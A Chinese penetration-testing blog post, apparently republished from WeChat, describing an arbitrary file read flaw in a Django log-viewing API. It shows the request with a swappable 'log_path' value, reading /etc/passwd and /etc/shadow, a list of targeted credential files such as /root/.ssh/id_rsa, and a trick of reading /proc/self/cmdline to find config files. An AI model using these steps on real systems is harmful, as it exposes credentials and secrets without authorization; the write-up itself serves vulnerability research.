记一次任意文件读取漏洞的挖掘
2024-7-24 20:31:12 Author: mp.weixin.qq.com(查看原文) 阅读量:11 收藏
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

本文由@天明师傅原创投稿,记录的是一种别样的任意文件读取玩法,感谢分享  !

0x01 挖掘受阻

在某次测试时,碰到了一个python Django站的任意文件读取漏洞,涉及功能为操作日志的线上查看功能,功能截图如下:

漏洞点在查看功能处,点击查看后,原始数据包如下所示:

POST /mpc-server/api/v1/service/event_logs HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brContent-Type: application/jsonX-CSRFToken: Authorization: basic Content-Length: 56Origin: http://1.1.1.1Connection: keep-aliveReferer: http://1.1.1.1/index.htmlCookie: Priority: u=1
{"log_path":"/tools/mpc-fl-server/logs/event/event.log"}

此处给到的路径看着像绝对路径,尝试替换为:/etc/passwd。成功读到:

读取/etc/shadow,未发现可解密的字段。

尝试读取常见敏感信息,此处使用的字典为:Burpsuite Intruder的Local files - Linux

因为此处直接使用的root,未有普通用户,故将注意力放在以下文件上,但是均读不到。

/root/.bash_history/root/.ssh/id_rsa/root/.ssh/authorized_keys/etc/mysql.cnf/etc/redis.conf

0x02 别样的文件读取利用思路

请教了师傅,给了通过读取cmdline来获取配置文件的方法,具体步骤如下:

1)读取cmdline,获取配置文件路径
/proc/self/cmdline
java-Dfile.encoding=UTF-8-Duser.timezone=GMT+08-Dorg.eclipse.jetty.util.URI.charset=UTF-8-Dorg.eclipse.jetty.util.UrlEncoding.charset=UTF-8-Xms256m-Xmx10240m-XX:PermSize=256M-XX:MaxPermSize=1024M-XX:+UseParallelGc-XX:+UseParalleloldGc-XX:+HeapDumpOnoutofMemoryError-cp/home/project/manage_admin/bin/../WEB-INF/lib/*:/home/project/manage_admin/bin/../WEB-INF/classescom.junc.bootstrap.Starterstartbin

2)读取配置文件

web.xml

/home/project/manage_admin/bin/../WEB-INF/web.xml

Spring配置文件

/home/project/manage_admin/bin/../WEB-INF/classes/spring-init.xml

redis配置文件

/home/project/manage_admin/bin/../WEB-INF/classes/properties/redis.properties

0x03 尝试峰回路转

峰回路转个鬼,一时间猪油蒙了心。跑去读了cmdline

这下更伤心了,还记得前文提到的信息么,这个站是python的Django框架。躺了躺了,虽然洞没扩大,但是收获了一种别样的任意文件读取玩法。

如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

前面有同学问我有没优惠券,这里发放100张100元的优惠券,用完今年不再发放

往期回顾

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247495346&idx=1&sn=6a13b341165b3e94dc2c0b536102afa2&chksm=e8a5e4d1dfd26dc71464ad135e853d87e7f491832fb5be5df8cbac76e4094c044a8a7d961acf&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh